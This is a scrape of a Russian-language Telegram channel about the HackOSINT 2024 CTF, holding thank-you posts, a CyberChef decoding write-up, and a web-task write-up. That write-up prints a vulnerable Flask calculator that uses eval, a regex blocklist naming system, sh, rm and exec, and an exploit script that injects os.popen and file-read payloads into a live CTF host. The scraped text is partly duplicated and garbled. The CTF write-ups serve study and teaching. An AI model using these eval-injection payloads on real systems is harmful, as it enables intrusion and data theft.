Это было великолепно
Хочу сказать большое спасибо всем, кто принимал участие. Организаторы были всегда на связи. Было много фана. Я просто в восторге
Хочу сказать большое спасибо всем, кто принимал участие. Организаторы были всегда на связи. Было много фана. Я просто в восторге
👍6🔥2❤1
Media is too big
VIEW IN TELEGRAM
Расширенная режиссерская версия
Всех еще раз с окончанием этого прекрасного мероприятия!
Идите спать
Всех еще раз с окончанием этого прекрасного мероприятия!
Идите спать
❤9🔥5
Мой дорогой друг, БРАТ, сдал экзамен по отрыжке (Burp)
Если у вас есть вопросики и вы стремитесь стать кибер-котлетами учитесь и пишите ему!
https://t.me/wr3dmast3rvs/46
Если у вас есть вопросики и вы стремитесь стать кибер-котлетами учитесь и пишите ему!
https://t.me/wr3dmast3rvs/46
Telegram
wr3dmast3r vs pentest
Наконец-то дошли руки до повторной сдачи экзамена.
При первой попытке полгода назад в ходе решения у меня не получилось найти ни одной уязвимости, из-за чего было тяжело реабилитироваться.
Но эти полгода не прошли даром. После прохождения 90% лабораторных…
При первой попытке полгода назад в ходе решения у меня не получилось найти ни одной уязвимости, из-за чего было тяжело реабилитироваться.
Но эти полгода не прошли даром. После прохождения 90% лабораторных…
🔥5❤2
#crypto
HackOSINT
Бонусный трек
Билибизяка от @Max_RSC
Ссылка на задание
Сомневаюсь, что у кого-нибудь возникли трудности с первым этапом — это простейшее декодирование из binary. Инструмент Кибершеф, который для решения этого таска рекомендовали сами организаторы, автоматически определяет данную кодировку и любезно предлагает декодировать текст. Насколько я знаю, у большинства возникли трудности именно со вторым этапом.
Итак, после преобразования из binary мы получили непонятные 24 числа. Здесь надо применить рецепт From Float. Обратимся к документации Кибершефа и узнаем, какое преобразование производит этот рецепт:
IEEE754 — это стандарт, описывающий формат представления чисел с плавающей точкой. Используется, например, в компиляторах различных языков программирования.
Применяем рецепт From Float. Результат, который мы получили, не очень воодушевляет, но мы видим, что Кибершеф сразу подсказывает нам следующее преобразование: надо применить рецепт Gunzip. Делаем это и получаем строку в hex-нотации, которую Кибершеф снова предлагает нам декодировать, поначалу применив рецепт From Hex, а затем Url Decode. Так мы приходим к финальной строке, которая представляет собой стимовский урл:
иди решай задачу, не жульничай!
Идем по ссылке и находим флаг в имени юзера.
Кстати, кому-нибудь интересно, как выполнить преобразование From Float средствами Python? Если интересно, напишите об этом в комментариях — расскажу.
#HackOSINT2024
HackOSINT
Бонусный трек
Билибизяка от @Max_RSC
Ссылка на задание
Сомневаюсь, что у кого-нибудь возникли трудности с первым этапом — это простейшее декодирование из binary. Инструмент Кибершеф, который для решения этого таска рекомендовали сами организаторы, автоматически определяет данную кодировку и любезно предлагает декодировать текст. Насколько я знаю, у большинства возникли трудности именно со вторым этапом.
Итак, после преобразования из binary мы получили непонятные 24 числа. Здесь надо применить рецепт From Float. Обратимся к документации Кибершефа и узнаем, какое преобразование производит этот рецепт:
Convert from IEEE754 Floating Point Numbers
IEEE754 — это стандарт, описывающий формат представления чисел с плавающей точкой. Используется, например, в компиляторах различных языков программирования.
Применяем рецепт From Float. Результат, который мы получили, не очень воодушевляет, но мы видим, что Кибершеф сразу подсказывает нам следующее преобразование: надо применить рецепт Gunzip. Делаем это и получаем строку в hex-нотации, которую Кибершеф снова предлагает нам декодировать, поначалу применив рецепт From Hex, а затем Url Decode. Так мы приходим к финальной строке, которая представляет собой стимовский урл:
Идем по ссылке и находим флаг в имени юзера.
Кстати, кому-нибудь интересно, как выполнить преобразование From Float средствами Python? Если интересно, напишите об этом в комментариях — расскажу.
#HackOSINT2024
❤11🔥3👍2
#WEB
HackOSINT
Задание "Калькилятор" от t.me/the_tigor
Ссылка на задание
Пробуем запихнуть что-нибудь эдакое и видим в devtools браузера заголовок
Пробуем
Доставать результаты будем так
Пробуем пропихнуть
Узнаем что флаг валяется рядом и вытаскиваем его по частям, пропихивая свой пейлоад между суммой нулей и конвертируя в число куски по 6 байтов
Флагищи сам, хитрюшка!
Заодно вытащили
#HackOSINT2024
HackOSINT
Задание "Калькилятор" от t.me/the_tigor
Ссылка на задание
Пробуем запихнуть что-нибудь эдакое и видим в devtools браузера заголовок
Debug, в котором лежит регулярка !~(^(-\d|\d).*\d$|^\d$)Пробуем
0+int("1")+0, получаем 1.0, похоже там python eval, вполне ожидаемо, остается придумать как это эксплуатироватьДоставать результаты будем так
0+int.from_bytes("str".encode(),'big')+0, обратно конвертируем беря число и (7566450).to_bytes(6, 'big'). Если брать больше 6 байт, получается запись в scientific notation, можно конечно упаковать компактнее, но и так сойдетПробуем пропихнуть
__import__("os").popen, но не проходит, выясняем что дело в __. Но как быть? Оказывается import os написали уже за нас и можно дернуть os.popen("ls")Узнаем что флаг валяется рядом и вытаскиваем его по частям, пропихивая свой пейлоад между суммой нулей и конвертируя в число куски по 6 байтов
Флаг
Заодно вытащили
app.py но там ничего интересного. Забанены не только __, но и r'.*?([sS][yY][sS][tT][eE][mM]|[sS][hH]|[rR][mM]|[eE][xX][eE][cC]|__).*?' Почему автор таска не юзал re.I вопрос открытый)
from flask import Flask, render_template_string, request, Response
import re
import os
app = Flask(__name__)
html = '''<!DOCTYPE html>
<html>
<head>
<title>Silly Calculator</title>
<style>
body {
font-family: Arial, sans-serif;
display: flex;
text-align: center;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
flex-direction: column;
background-color: lightblue; /* ÐлÑпÑй ÑÐ²ÐµÑ Ñона */
}
h1 {
font-size: 5em;
}
input {
width: 200px;
height: 30px;
font-size: 1.5em;
}
</style>
</head>
<body>
<h1>Silly Calculator</h1>
<div>
<form method="GET">
<input style="width:10em;margin:.5em" type="text" name="statement">
<input value="=" style="width: 2em; margin:.5em" type="submit">
</form>
<h2>%s</h2>
</div>
</body>
</html>'''
@app.route("/", methods=['GET'])
def hello_world():
statement = request.args.get('statement')
if statement:
if re.match(r'.*?([sS][yY][sS][tT][eE][mM]|[sS][hH]|[rR][mM]|[eE][xX][eE][cC]|__).*?', statement):
answer = 'invalid input'
debug = 'Input Filtered'
resp = Response(html % answer)
resp.headers["Debug"] = debug
return resp
elif not re.match(r'(^(-\d|\d).*\d$|^\d$)', statement):
answer = 'invalid input'
debug = '!~(^(-\d|\d).*\d$|^\d$)'
resp = Response(html % answer)
resp.headers["Debug"] = debug
return resp
else:
try:
answer = eval(statement)
answer = float(answer)
resp = Response(html % answer)
resp.headers["Debug"] = answer
return resp
except Exception as e:
answer = 'invalid input'
debug = e
resp = Response(html % answer)
resp.headers["Debug"] = debug
return resp
else:
resp = Response(html % '')
return resp
ifdebug = '!== '__main__':
app.run(host='127.0.0.1', port=5000)
pass
import requests
from bs4 import BeautifulSoup
from urllib.parse import quote
import time
def exec(command, count=1024):
for i in range(count):
time.sleep(1)
statement = f"0+int.from_bytes({command}[{str(i*6)}:{str(i*6+6)}],'big')+0"
url = f'http://91.200.84.50/?statement={quote(statement)}'
req = requests.get(url)
soup = BeautifulSoup(req.text)
data = soup.find('h2').text
num = int(data.split(".")[0])
if num == 0:
return
print(num.to_bytes(6, 'big').decode('utf-8'), end="")
# exec("open('/start.sh', 'rb').read()")
# exec("os.popen('ls /').read().encode()")
# exec("os.popen('touch t').read().encode()")
#HackOSINT2024
Telegram
Жека Тигор
кот, мемы, гиковские приколы и белградский лайфстайл
Все сказанное тут - личное мнение автора
Все сказанное тут - личное мнение автора
❤5
@Schwarz_Osint_contact @CyberFazaN, вы в курсе, что это был один из лучших CTF BEST EVER?
Лайк если согласен
Лайк если согласен
❤23
This media is not supported in your browser
VIEW IN TELEGRAM
Привет мои дорогие кибер-котлетки
Сегодня был очень жесткий и тяжелый день как морально, так и физически.
Не успел сегодня опубликовать. Завтра исправлюсь, обещаю
Мне прислали множество интересных отчетов. Нужно их чуть обработать, чтобыникакого читерства и флажок вы добывали сами!
Всем хорошей пятницы!
Сегодня был очень жесткий и тяжелый день как морально, так и физически.
Не успел сегодня опубликовать. Завтра исправлюсь, обещаю
Мне прислали множество интересных отчетов. Нужно их чуть обработать, чтобы
Всем хорошей пятницы!
👍8
SI team.pdf
23 MB
Все привет! ❤️
Я наконец-то замазал все (почти) флаги и выбрал ТОП 3 отчета на мой субъективный взгляд
1 место EXE.1sior, если быть, то лучшим во всем и это про вас!
50USDT ваши, скиньте мне ваш кошелек
2 место XLS Team, просто хорошо, ну вот хорошо и все!
Получаете фирменные значки на всю команду. Скажите куда отправить
3 место SI team, за много букв, старались
И вам значки отправлю, в следующий раз прям постарайтесь, есть куда стремиться
Я хочу сказать всем спасибо, кто поделился райтами
@collapsz, @GorgonzolaCTF, @dontunique, @Bbggleave, w33d, @Rean1mat0r
Вы реальные кибер-котлеты, вносите большой вклад в развитие нашего уютненького, не токсичного, образовательного сообщества 😇
#HackOSINT2024
Я наконец-то замазал все (почти) флаги и выбрал ТОП 3 отчета на мой субъективный взгляд
1 место EXE.1sior, если быть, то лучшим во всем и это про вас!
50USDT ваши, скиньте мне ваш кошелек
2 место XLS Team, просто хорошо, ну вот хорошо и все!
Получаете фирменные значки на всю команду. Скажите куда отправить
3 место SI team, за много букв, старались
И вам значки отправлю, в следующий раз прям постарайтесь, есть куда стремиться
Я хочу сказать всем спасибо, кто поделился райтами
@collapsz, @GorgonzolaCTF, @dontunique, @Bbggleave, w33d, @Rean1mat0r
Вы реальные кибер-котлеты, вносите большой вклад в развитие нашего уютненького, не токсичного, образовательного сообщества 😇
#HackOSINT2024
🔥12👍2
Forwarded from Hacker Lab
🚩 Новые задания на платформе Codeby Games!
🏆 Категория Квесты — Отцы-основатели
🎢 Категория Разное — Текстурпак
🔎 Категория OSINT — Друг-анимешник
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
#разное #codeby
Великий математик от @while_not_False (пацана знаю лично, просто настоящая кибер-котлета для своих лет!)
Ссылка на задание
#codebygames
Великий математик от @while_not_False (пацана знаю лично, просто настоящая кибер-котлета для своих лет!)
Ссылка на задание
from pwn import remote
import re
print('\033[31m')
host = "62.173.140.174"
port = 10360
def solve_equation(equation):
pattern = r'\((.*?)\)\s*(\w+)\s*([\+\-\*\/])\s*(\w+)\s*=\s*(-?\d+)'
match = re.match(pattern, equation)
if match:
x = match.group(2) # значение после скобок и до оператора
op = match.group(3) # оператор
y = match.group(4) # значение после оператора и до знака равенства
z = int(match.group(5)) # значение после знака равенства
# Пробуем привести x и y к целому числу, если не получится - оставляем как строку
try:
x = int(x)
except:
pass
try:
y = int(y)
except:
pass
if isinstance(x, str):
if op == '+':
result = z - y
elif op == '-':
result = z + y
elif op == '*':
result = z // y
elif op == '/':
result = z * y
else:
return None
elif isinstance(y, str):
if op == '+':
result = z - x
elif op == '-':
result = x - z
elif op == '*':
result = z // x
elif op == '/':
result = x // z
else:
return None
else:
return None
return result
else:
return None
def main():
conn = remote(host, port)
for _ in range(8):
print(conn.recvline().decode())
conn.sendline('start')
for _ in range(3):
print(conn.recvline().decode())
while True:
conn.recvline().decode()
equation = conn.recvline().decode().strip()
if "FLAG" in equation:
print('\033[31m' + f"\n\n{equation}")
break
print('\033[32m' + f"{equation}")
print(conn.recvline().decode())
solution = solve_equation(equation)
if solution is not None:
print('\033[33m' + ">>> " + '\033[34m' + f"{solution}")
conn.sendline(str(solution))
else:
print("Error")
break
conn.close()
if __name__ == "__main__":
main()
#codebygames
🔥6👍1